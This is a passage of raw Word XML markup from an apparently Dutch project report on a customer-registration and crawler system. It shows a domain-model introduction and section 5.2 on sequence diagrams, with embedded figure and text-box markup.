                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5819140" cy="2565400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003C470B" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>De omschrijvingen en illustraties</w:t>
      </w:r>
      <w:r w:rsidR="00DE06EE" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE06EE" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE06EE" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cases in het vorige deel (5.1, 5.2)</w:t>
      </w:r>
      <w:r w:rsidR="00260E3F" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> heeft een aantal belangrijke concepten </w:t>
      </w:r>
      <w:r w:rsidR="00D20FF2" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>van het s</w:t>
      </w:r>
      <w:r w:rsidR="00260E3F" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ysteem</w:t>
      </w:r>
      <w:r w:rsidR="00ED2730" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> geïntroduceerd.</w:t>
      </w:r>
      <w:r w:rsidR="00D20FF2" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE14C5" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Zoals klant, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE14C5" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE14C5" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, Rapport, etc. Deze concepten (Deze zijn al in H4 besproken, Concepten)</w:t>
      </w:r>
      <w:r w:rsidR="00907759" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> representeren de entite</w:t>
      </w:r>
      <w:r w:rsidR="00EF3B12" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>iten die het systeem nodig heeft om de vastgestelde objectieven te bereiken</w:t>
      </w:r>
      <w:r w:rsidR="00907759" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EE27BE" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Een domein model is een visuele representatie van deze entiteiten en de relaties die zij ten opzichte hebben van elkaar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E22DADE" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103E7F15" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703F2515" w14:textId="171E3514" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00C57256" w:rsidP="00395EE0">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PAS Relatie Registratie met API aan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9BE719" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF77AB5" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EEADF3E" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEDAE75" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098173A4" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5343FC90" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D11648" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C5EEF4" w14:textId="77777777" w:rsidR="00395EE0" w:rsidRPr="00395EE0" w:rsidRDefault="00395EE0" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4933DECB" w14:textId="786CD04B" w:rsidR="00C74CAF" w:rsidRPr="00395EE0" w:rsidRDefault="00C74CAF" w:rsidP="00395EE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00C74CAF" w:rsidRPr="00395EE0" w:rsidSect="00A024DA">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54165A26" w14:textId="56EC2B70" w:rsidR="00BD01D5" w:rsidRPr="00FE14C5" w:rsidRDefault="00BD01D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1613E2D1" w14:textId="5D30E47B" w:rsidR="00D972D2" w:rsidRDefault="00620167" w:rsidP="00D972D2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc491022093"/>
      <w:r>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="001424EB">
        <w:t xml:space="preserve"> Systeem Diagrammen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="1DA980E4" w14:textId="287A0387" w:rsidR="001424EB" w:rsidRDefault="00B95438" w:rsidP="001424EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251826176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BE62403" wp14:editId="77007C59">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>349885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5749290" cy="929005"/>
                <wp:effectExtent l="0" t="0" r="16510" b="36195"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3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297"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="155F9C39" w14:textId="087BD1D7" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00B95438">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                                <w:noProof/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74AAC828" wp14:editId="56CD992C">
                                  <wp:extent cx="266700" cy="266700"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="516"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b/>
                              </w:rPr>
                              <w:t>Systeem Diagrammen</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5C36F37E" w14:textId="00CDE298" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00B95438">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Systeem diagrammen in de context van software, zijn krachtige tools die helpen bij het begrijpen hoe een complex systeem werkt.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62403" id="_x0000_s1116" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:27.55pt;width:452.7pt;height:73.15pt;z-index:251826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BInT4CAABwBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L46cZOlMeIUXbsOA7oL&#10;0O4DaFmOhUiiJymxs68vJadZur0NexEokT4kzyG9uh6MZnvpvEJb8unFhDNpBdbKbkr+4+n+3RVn&#10;PoCtQaOVJT9Iz6/Xb9+s+q6QObaoa+kYgVhf9F3J2xC6Isu8aKUBf4GdtORs0BkIdHWbrHbQE7rR&#10;WT6ZvM96dHXnUEjv6fVudPJ1wm8aKcK3pvEyMF1yqi2k06Wzime2XkGxcdC1ShzLgH+owoCylPQE&#10;dQcB2M6pv6CMEg49NuFCoMmwaZSQqQfqZjr5o5vHFjqZeiFyfHeiyf8/WPF1/90xVZf8kpSyYEij&#10;J7n1YQ9blkd6+s4XFPXYUVwYPuBAMqdWffeAYuuZxdsW7EbeOId9K6Gm8qbxy+zs0xHHR5Cq/4I1&#10;pYFdwAQ0NM5E7ogNRugk0+EkjRwCE/Q4X8yW+ZJcgnxk5ctFSgHFy9ed8+GTRMOiUXJH0id02D/4&#10;EKuB4iUkJvOoVX2vtE6XOG7yVju2BxqUajN2qHeGSh3flvPJJI0L4aTpjOEJ9RWStqynAuf5fOTo&#10;VRa3qU45CO0M8DzMqEAroZUp+dUpCIrI7Edbp4ENoPRoUzXaHqmO7I48h6EakqhXly8SVlgfiHyH&#10;4wrQypLRovvFWU/jX3L/cwdOcqY/WxJwOZ3N4r6ky2y+yOnizj3VuQesIKiSB85G8zakHYvcWrwh&#10;oRuVNIgTMVZyrJnGOpF4XMG4N+f3FPX7R7F+BgAA//8DAFBLAwQUAAYACAAAACEAG5J4u90AAAAH&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KidqqloyKZCIC6VEKKFAzcn3iYR&#10;8TqynTb8PeZEj6MZzbwpt7MdxIl86B0jZAsFgrhxpucW4ePwcncPIkTNRg+OCeGHAmyr66tSF8ad&#10;+Z1O+9iKVMKh0AhdjGMhZWg6sjos3EicvKPzVsckfSuN1+dUbge5VGotre45LXR6pKeOmu/9ZBHs&#10;a827L945Y6aDf47rt0/aHBFvb+bHBxCR5vgfhj/8hA5VYqrdxCaIASEdiQh5noFI7kblKxA1wlJl&#10;K5BVKS/5q18AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAbuBInT4CAABwBAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAG5J4u90AAAAHAQAADwAA&#10;AAAAAAAAAAAAAACWBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" fillcolor="#f2f2f2 [3052]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="155F9C39" w14:textId="087BD1D7" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00B95438">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                          <w:noProof/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74AAC828" wp14:editId="56CD992C">
                            <wp:extent cx="266700" cy="266700"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="516"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b/>
                        </w:rPr>
                        <w:t>Systeem Diagrammen</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5C36F37E" w14:textId="00CDE298" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00B95438">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Systeem diagrammen in de context van software, zijn krachtige tools die helpen bij het begrijpen hoe een complex systeem werkt.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F3ACD" w14:textId="77777777" w:rsidR="00B95438" w:rsidRDefault="00B95438" w:rsidP="001424EB"/>
    <w:p w14:paraId="5D46EC67" w14:textId="7ABCA8A6" w:rsidR="001424EB" w:rsidRDefault="00620167" w:rsidP="00B10045">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc491022094"/>
      <w:r>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="00B10045">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B10045">
        <w:t>Sequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B10045">
        <w:t xml:space="preserve"> Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="28BDFC46" w14:textId="109DA305" w:rsidR="00B10045" w:rsidRDefault="00B10045" w:rsidP="00B10045"/>
    <w:p w14:paraId="3BA32F60" w14:textId="6AEC4024" w:rsidR="00EF49A2" w:rsidRDefault="00B87C03" w:rsidP="00B10045">
      <w:r>
        <w:t>Elke systeemproces</w:t>
      </w:r>
      <w:r w:rsidR="008A1DBC">
        <w:t xml:space="preserve"> heeft een succes scenario</w:t>
      </w:r>
      <w:r w:rsidR="00F85A89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A1DBC">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A1DBC">
        <w:t>UseCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A1DBC">
        <w:t xml:space="preserve"> Bijlage)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. De succes scenario’s kun je in stappen omschrijven zoals bij een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00EF49A2">
        <w:t>secase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49A2">
        <w:t xml:space="preserve"> maar je kunt de systeemprocessen ook illustreren in een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49A2">
        <w:t>sequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49A2">
        <w:t xml:space="preserve"> diagram. Een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49A2">
        <w:t>sequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49A2">
        <w:t xml:space="preserve"> diagram is een interactie diagram die aantoont hoe verschillende acteurs en systemen met elkaar communiceren en in welke volgorde. Ik zal in deze paragraaf voor de 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49A2">
        <w:t>usecases</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49A2">
        <w:t xml:space="preserve"> een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49A2">
        <w:t>sequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49A2">
        <w:t xml:space="preserve"> diagram illustreren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8486C4" w14:textId="3F32EE15" w:rsidR="00EF49A2" w:rsidRDefault="00793903" w:rsidP="00B10045">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252034048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01D0E197" wp14:editId="098FC140">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-12065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>230505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4509770" cy="3507105"/>
            <wp:effectExtent l="0" t="0" r="11430" b="0"/>
            <wp:wrapTopAndBottom/>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Sequence_diagram_UC1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4509770" cy="3507105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009719D7">
        <w:t>UC-1: registreer klant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C18532" w14:textId="1FE47372" w:rsidR="009719D7" w:rsidRDefault="00626B4E" w:rsidP="00B10045">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252041216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D973C0A" wp14:editId="131CAE84">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-9525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3457575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5039995" cy="104140"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="15805"/>
                    <wp:lineTo x="21445" y="15805"/>
                    <wp:lineTo x="21445" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="529" name="Text Box 529"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5039995" cy="104140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="46FCFE7A" w14:textId="6246E787" w:rsidR="00CE4BB5" w:rsidRPr="0069455B" w:rsidRDefault="00CE4BB5" w:rsidP="00793903">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 5.4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973C0A" id="Text Box 529" o:spid="_x0000_s1117" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.75pt;margin-top:272.25pt;width:396.85pt;height:8.2pt;z-index:25204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ZxYjsCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRNj9owEL1X6n+wfC8JFKolIqwoK6pKaHcl&#10;qPZsHJtYcjyubUjor+/YIWy77anqxRnPjOfjvZks7rtGk7NwXoEp6XiUUyIMh0qZY0m/7Tcf7ijx&#10;gZmKaTCipBfh6f3y/btFawsxgRp0JRzBIMYXrS1pHYItsszzWjTMj8AKg0YJrmEBr+6YVY61GL3R&#10;2STPP2UtuMo64MJ71D70RrpM8aUUPDxJ6UUguqRYW0inS+chntlywYqjY7ZW/FoG+4cqGqYMJr2F&#10;emCBkZNTf4RqFHfgQYYRhyYDKRUXqQfsZpy/6WZXMytSLwiOtzeY/P8Lyx/Pz46oqqSzyZwSwxok&#10;aS+6QD5DR6IOEWqtL9BxZ9E1dGhApge9R2VsvJOuiV9siaAdsb7c8I3hOCpn+cf5fD6jhKNtnE/H&#10;00RA9vraOh++CGhIFErqkL8EKztvfcBK0HVwick8aFVtlNbxEg1r7ciZIddtrYKINeKL37y0ib4G&#10;4qve3GtEGpZrlthw31iUQnfoEkR306HrA1QXBMNBP1De8o3C9FvmwzNzOEHYP25FeMJDamhLCleJ&#10;khrcj7/poz8Si1ZKWpzIkvrvJ+YEJfqrQcrj+A6CG4TDIJhTswZsfIz7ZnkS8YELehClg+YFl2UV&#10;s6CJGY65ShoGcR36vcBl42K1Sk44pJaFrdlZHkMPMO+7F+bslaSA9D7CMKuseMNV79uDvjoFkCoR&#10;GYHtUUSO4gUHPLF1Xca4Qb/ek9frL2P5EwAA//8DAFBLAwQUAAYACAAAACEAekmRr+AAAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPTU/CQBCG7yb+h82YeDGwpYEKpVuioDc8gITz0h3bxu5s093S&#10;8u8dT3qbjyfvPJNtRtuIK3a+dqRgNo1AIBXO1FQqOH2+T5YgfNBkdOMIFdzQwya/v8t0atxAB7we&#10;Qyk4hHyqFVQhtKmUvqjQaj91LRLvvlxndeC2K6Xp9MDhtpFxFCXS6pr4QqVb3FZYfB97qyDZdf1w&#10;oO3T7vS21x9tGZ9fb2elHh/GlzWIgGP4g+FXn9UhZ6eL68l40SiYzBZMKljM51ww8LyKYxAXniTR&#10;CmSeyf8v5D8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAspZxYjsCAAB6BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAekmRr+AAAAAKAQAADwAA&#10;AAAAAAAAAAAAAACTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="46FCFE7A" w14:textId="6246E787" w:rsidR="00CE4BB5" w:rsidRPr="0069455B" w:rsidRDefault="00CE4BB5" w:rsidP="00793903">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 5.4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526B547" w14:textId="357F5BF5" w:rsidR="00EC1532" w:rsidRDefault="00B85B65" w:rsidP="00540204">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252037120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B2B1799" wp14:editId="3F37D0A7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>57785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>355600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4192905" cy="3599815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapTopAndBottom/>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Sequence_diagram_UC2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
